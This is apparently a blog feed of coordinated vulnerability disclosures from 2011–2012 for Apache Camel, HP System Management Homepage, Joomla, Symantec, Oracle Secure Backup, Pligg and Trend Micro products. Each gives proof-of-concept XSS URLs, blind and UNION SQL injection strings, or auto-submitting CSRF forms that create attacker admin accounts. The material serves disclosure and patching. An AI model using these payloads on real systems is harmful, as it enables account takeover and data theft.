<span style="font-family: Verdana, sans-serif;">Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">Reflected XSS</span><br />
<span style="font-family: Verdana, sans-serif;">===========</span><br />
<span style="font-family: Verdana, sans-serif;">http://[target]:8161/demo/portfolioPublish?count=1&refresh='"--></style></script><script>alert(/XSS/)</script>&stocks=SUNW</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Permanent XSS</span><br />
<span style="font-family: Verdana, sans-serif;">============</span><br />
<span style="font-family: Verdana, sans-serif;">http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">To trigger Permanent XSS:</span><br />
<span style="font-family: Verdana, sans-serif;">====================</span><br />
<span style="font-family: Verdana, sans-serif;">http://[target]:8161/camel/endpoints</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-qDpL-D2EuZ0/T5xIiTH_aZI/AAAAAAAAAFs/P67ngNM_vhQ/s1600/Apache+ActiveMQ-5.5.0-XSS-02.PNG"><img border="0" height="250" src="http://4.bp.blogspot.com/-qDpL-D2EuZ0/T5xIiTH_aZI/AAAAAAAAAFs/P67ngNM_vhQ/s400/Apache+ActiveMQ-5.5.0-XSS-02.PNG" /></a></span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Solution</span></b><br />Update to version 2.7.2 or later.<br /><br /><b><span style="color: orange;">Reference</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="https://issues.apache.org/jira/browse/CAMEL-3991" style="font-family: Verdana, sans-serif;" target="_blank">https://issues.apache.org/jira/browse/CAMEL-3991</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-05-06 - Vulnerabilities discovered.<br />2011-05-06 - Vulnerabilities reported to Secunia.<br />2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.<br />2011-05-19 - Patch released.<br />2011-05-19 - Advisory published by Apache.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/tU7iv40oPkg" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/apache-camel-270-cross-site-scripting.htmltag:blogger.com,1999:blog-566969067083138258.post-1988967887479037082012-04-29T02:40:00.001+08:002012-05-11T14:46:22.417+08:002012-05-11T14:46:22.417+08:00HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">HP System Management Homepage is a web-based interface that consolidates and simplifies the management of individual ProLiant and Integrity servers running Microsoft Windows or Linux operating systems, or HP 9000 and HP Integrity servers running HP-UX 11i.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in HP System Management Homepage. This issue was discovered in a default installation of HP System Management Homepage 6.2.2.7. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;"><html></span><br />
<span style="font-family: Verdana, sans-serif;"><body></span><br />
<span style="font-family: Verdana, sans-serif;"><form action="https://[target]:2381/proxy/SetSMHData" id="csrf" method="post"></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="admin-group" value="Users" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="operator-group" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="user-group" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"></form></span><br />
<span style="font-family: Verdana, sans-serif;"><script></span><br />
<span style="font-family: Verdana, sans-serif;">document.getElementById('csrf').submit();</span><br />
<span style="font-family: Verdana, sans-serif;"></script></span><br />
<span style="font-family: Verdana, sans-serif;"></body></span><br />
<span style="font-family: Verdana, sans-serif;"></html></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br />
<b><span style="color: orange;">Solution</span></b><br />HP has provided HP System Management Homepage v7.0 or subsequent to resolve the vulnerabilities. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632" style="font-family: Verdana, sans-serif;" target="_blank">http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43012/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/43012/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-01-21 - Vulnerability discovered.<br />2011-01-21 - Vulnerability reported to Secunia.<br />2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.<br />2012-04-11 - Advisory published by Secunia </span><span style="font-family: Verdana, sans-serif;">since it has been coordinated for more than a year.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">2012-04-19 - Patch released.<br />2012-04-20 - Advisory updated by Secunia.</span></span></span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/p36_z-CmXGs" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/hp-system-management-homepage-6227.htmltag:blogger.com,1999:blog-566969067083138258.post-4314021945347496562012-04-29T02:17:00.002+08:002012-07-12T10:19:05.459+08:002012-07-12T10:19:05.459+08:00Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.<br /><br />Stratsec </span><span style="font-family: Verdana, sans-serif;">vulnerability </span><span style="font-family: Verdana, sans-serif;">researcher, Sow Ching Shiong has discovered Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Other earlier versions may also be affected.</span><br />
<br />
<span style="color: orange; font-family: Verdana, sans-serif;"><b>Proof of concept URLs which will cause a time delay of 30 seconds are provided below:</b></span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">Solution</span></b><br />Update to version 2.5.2 or later.<br /><br /><b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html" style="font-family: Verdana, sans-serif;" target="_blank">http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html</a><br />
<span style="font-family: Verdana, sans-serif;">Stratsec: </span><a href="http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)" style="font-family: Verdana, sans-serif;" target="_blank">http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2012-02-29 - Vulnerability discovered.<br />2012-02-29 - Vulnerability reported to vendor.<br />2012-03-01 - Vendor acknowledged and confirmed the vulnerability.<br />2012-03-05 - Patch released.<br />2012-03-19 - Advisory published by Stratsec.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/S0jABwgbqqw" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com1http://chingshiong.blogspot.com/2012/04/joomla-cms-251-blind-sql-injection.htmltag:blogger.com,1999:blog-566969067083138258.post-84226883095931999192012-04-29T01:28:00.001+08:002012-05-11T14:46:51.275+08:002012-05-11T14:46:51.275+08:00Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">SQL Injection<br />==========</span><span style="font-family: Verdana, sans-serif;"></span><br />
<span style="font-family: Verdana, sans-serif;">http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--</span><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="http://4.bp.blogspot.com/-6TkVks0Wh6U/T5woLihAuMI/AAAAAAAAAFg/6OuRC0u2eqs/s1600/Symantec-IM-SQL-Injection-PoC.JPG"><img border="0" height="198" src="http://4.bp.blogspot.com/-6TkVks0Wh6U/T5woLihAuMI/AAAAAAAAAFg/6OuRC0u2eqs/s400/Symantec-IM-SQL-Injection-PoC.JPG" /></a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: Verdana, sans-serif;">Cross-Site Scripting (XSS)<br />====================</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E</span></li>
</ul>
<br />
<a href="http://1.bp.blogspot.com/-fo9eG7rmgso/T5wlkbSvdrI/AAAAAAAAAFU/_G-xRy0JvZk/s1600/Symantec-IM-XSS-PoC.jpg"><img border="0" height="211" src="http://1.bp.blogspot.com/-fo9eG7rmgso/T5wlkbSvdrI/AAAAAAAAAFU/_G-xRy0JvZk/s400/Symantec-IM-XSS-PoC.jpg" /></a>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Solution</span></b><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">Symantec has released patches which address these issues. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span></span><br /><span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00" target="_blank">http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00</a><br /><span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43157/" target="_blank">http://secunia.com/advisories/43157/</a><br /><br /><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-02-18 - Vulnerabilities discovered.<br />2011-02-18 - Vulnerabilities reported to Secunia.<br />2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.<br />2011-09-29 - </span><span style="font-family: Verdana, sans-serif;">Patch released.<br />2011-09-30 - </span>Advisory published by Secunia.</span></span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/cm4_DpBt4Nw" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/symantec-im-manager-8417-sql-injection.htmltag:blogger.com,1999:blog-566969067083138258.post-88784809058853955442012-04-29T01:01:00.000+08:002012-05-01T23:48:48.516+08:002012-05-01T23:48:48.516+08:00Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publishing software that encourages visitors to register on your website so that they can submit content and connect with other users.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Pligg CMS. This issue was discovered in a default installation of Pligg CMS 1.1.4. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">http://[target]/pligg/search.php?adv=1&advancesearch=&nbsp;Search&nbsp;&date=1</title><script>alert(/XSS/)</script>&scategory=1&scomments=1&search=&sgroup=3&slink=3&stags=1&status=all&suser=1</span><br />
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">Solution</span></b><br />Update to version 1.2.0 or later.<br /><br /><b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://forums.pligg.com/downloads.php?do=file&id=13" style="font-family: Verdana, sans-serif;" target="_blank">http://forums.pligg.com/downloads.php?do=file&id=13</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/44352/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/44352/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-04-24 - Vulnerability discovered.<br />2011-04-24 - Vulnerability reported to Secunia.<br />2011-04-26 - Secunia confirmed the vulnerability and contacted the vendor.<br />2011-09-18 - Patch released.<br />2011-09-20 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/p8noA3UQRXM" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/pligg-cms-114-cross-site-scripting.htmltag:blogger.com,1999:blog-566969067083138258.post-37371661481938481412012-04-28T22:30:00.000+08:002012-05-11T14:47:09.562+08:002012-05-11T14:47:09.562+08:00Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">Cross-Site Request Forgery (CSRF)<br />==========================</span>
<span style="font-family: Verdana, sans-serif;"></span><br />
<span style="font-family: Verdana, sans-serif;"><html></span><br />
<span style="font-family: Verdana, sans-serif;"><body></span><br />
<span style="font-family: Verdana, sans-serif;"><form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"</span><br />
<span style="font-family: Verdana, sans-serif;">id="csrf" method="post"></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="spcName" value="attacker" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="spcUsername" value="attacker" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="spcNewPwd" value="passwd123" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="spcNewPwd2" value="passwd123" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="group1" value="Admin" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="btnSubmit" value="Create+Account" /></span><br />
<span style="font-family: Verdana, sans-serif;"></form></span><br />
<span style="font-family: Verdana, sans-serif;"><script></span><br />
<span style="font-family: Verdana, sans-serif;">document.getElementById('csrf').submit();</span><br />
<span style="font-family: Verdana, sans-serif;"></script></span><br />
<span style="font-family: Verdana, sans-serif;"></body></span><br />
<span style="font-family: Verdana, sans-serif;"></html></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Cross-Site Scripting (XSS)<br />====================</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script></span></li>
<li><span style="font-family: Verdana, sans-serif;">https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script></span></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><a href="http://1.bp.blogspot.com/-kAN7Bzyv2Gw/T5v930dt8EI/AAAAAAAAAFA/lQX58yzYzDo/s1600/XSS-IE6.PNG"><img border="0" src="http://1.bp.blogspot.com/-kAN7Bzyv2Gw/T5v930dt8EI/AAAAAAAAAFA/lQX58yzYzDo/s400/XSS-IE6.PNG" /></a></span></div>
<br />
<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Solution</span></b><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">Symantec has released patches which address these issues. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span></span><br /><span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00" target="_blank">http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00</a><br /><span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43662/" target="_blank">http://secunia.com/advisories/43662/</a><br /><br /><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-03-07 - Vulnerabilities discovered.<br />2011-03-07 - Vulnerabilities reported to Secunia.<br />2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.<br />2011-08-10 - </span><span style="font-family: Verdana, sans-serif;">Patch released.<br />2011-08-11 - </span>Advisory published by Secunia.</span></span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/1MTLH7py2vM" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/symantec-endpoint-protection-manager.htmltag:blogger.com,1999:blog-566969067083138258.post-53264092291603570342012-04-28T10:11:00.000+08:002012-05-11T14:47:27.413+08:002012-05-11T14:47:27.413+08:00Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup 10.3.0.3.0. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">Cross-Site Request Forgery (CSRF)<br />==========================</span><br />
<span style="font-family: Verdana, sans-serif;"><html></span><br />
<span style="font-family: Verdana, sans-serif;"><body></span><br />
<span style="font-family: Verdana, sans-serif;"><form action="https://[target]/index.php" id="csrf" method="post"></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="process" value="1" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="tab" value="2" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="mode" value="2" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="button" value="Ok" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="screen" value="d" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="selector%5B%5D" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="changeobject" value="attacker" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="upassword" value="passwd123" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="vpassword" value="passwd123" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="oclass" value="admin" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="uclass" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="givenname" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="unixname" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="unixgroup" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="ndmpserveruser" value="no" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="emailaddress" value="" /></span><br />
<span style="font-family: Verdana, sans-serif;"><input type="hidden" name="op" value="Add" /></span><br />
<span style="font-family: Verdana, sans-serif;"></form></span><br />
<span style="font-family: Verdana, sans-serif;"><script></span><br />
<span style="font-family: Verdana, sans-serif;">document.getElementById('csrf').submit();</span><br />
<span style="font-family: Verdana, sans-serif;"></script></span><br />
<span style="font-family: Verdana, sans-serif;"></body></span><br />
<span style="font-family: Verdana, sans-serif;"></html></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br />Cross-Site Scripting (XSS)<br />====================</span></span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3</span></span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))</span></span></li>
</ul>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">
</span></span><br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><a href="http://2.bp.blogspot.com/-3oo3ti9SRaE/T5tPRMudyCI/AAAAAAAAAE0/e7v_AgXtpY8/s1600/Oracle_Secure_Backup_XSS.png"><img border="0" src="http://2.bp.blogspot.com/-3oo3ti9SRaE/T5tPRMudyCI/AAAAAAAAAE0/e7v_AgXtpY8/s400/Oracle_Secure_Backup_XSS.png" /></a></span></span></span></span></div>
<span style="font-family: Verdana, sans-serif;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">
<br />
<b><span style="color: orange;">Solution</span></b><br />Oracle has released patches which address these issues. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html" style="font-family: Verdana, sans-serif;" target="_blank">http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43011/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/43011/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-01-21 - Vulnerabilities discovered.<br />2011-01-21 - Vulnerabilities reported to Secunia.<br />2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.<br />2011-07-19 - </span><span style="font-family: Verdana, sans-serif;">Patch released.<br />2011-07-20 - </span>Advisory published by Secunia.</span></span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/OL7o6OBJYsM" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/oracle-secure-backup-103030-cross-site.htmltag:blogger.com,1999:blog-566969067083138258.post-55480713950751270872012-04-28T09:44:00.000+08:002012-05-11T14:47:39.601+08:002012-05-11T14:47:39.601+08:00Trend Micro Control Manager 5.5 Directory Traversal Vulnerability<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Trend Micro Control Manager. This issue was discovered in a default installation of Trend Micro Control Manager 5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<br />
<a href="http://2.bp.blogspot.com/-c-31nFtw7gM/T5tLQ3UepeI/AAAAAAAAAEg/a8fEJh1i43c/s1600/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Request).png"><img border="0" src="http://2.bp.blogspot.com/-c-31nFtw7gM/T5tLQ3UepeI/AAAAAAAAAEg/a8fEJh1i43c/s400/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Request).png" /></a>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://4.bp.blogspot.com/-kcRvVlzMNx0/T5tLSbbzMQI/AAAAAAAAAEo/pKQ3z1aD4hk/s1600/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Response).png"><img border="0" src="http://4.bp.blogspot.com/-kcRvVlzMNx0/T5tLSbbzMQI/AAAAAAAAAEo/pKQ3z1aD4hk/s400/TM-Control-Manager-5.5-Dir-Traversal-PoC+(Response).png" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /><b><span style="color: orange;">Solution</span></b><br />Trend Micro has released patches which address this issue. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845" style="font-family: Verdana, sans-serif;" target="_blank">http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/44134/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/44134/</a><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-04-09 - Vulnerability discovered.<br />2011-04-09 - Vulnerability reported to Secunia.<br />2011-04-29 - Secunia confirmed the vulnerability and contacted the vendor.<br />2011-06-15 - Patch released.<br />2011-06-16 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/hMi39FcAkZA" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/trend-micro-control-manager-55.htmltag:blogger.com,1999:blog-566969067083138258.post-3414090118805383712012-04-28T09:39:00.000+08:002012-05-11T14:47:57.796+08:002012-05-11T14:47:57.796+08:00Trend Micro Control Manager 5.5 Cross-Site Scripting (XSS) Vulnerability<br />
<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
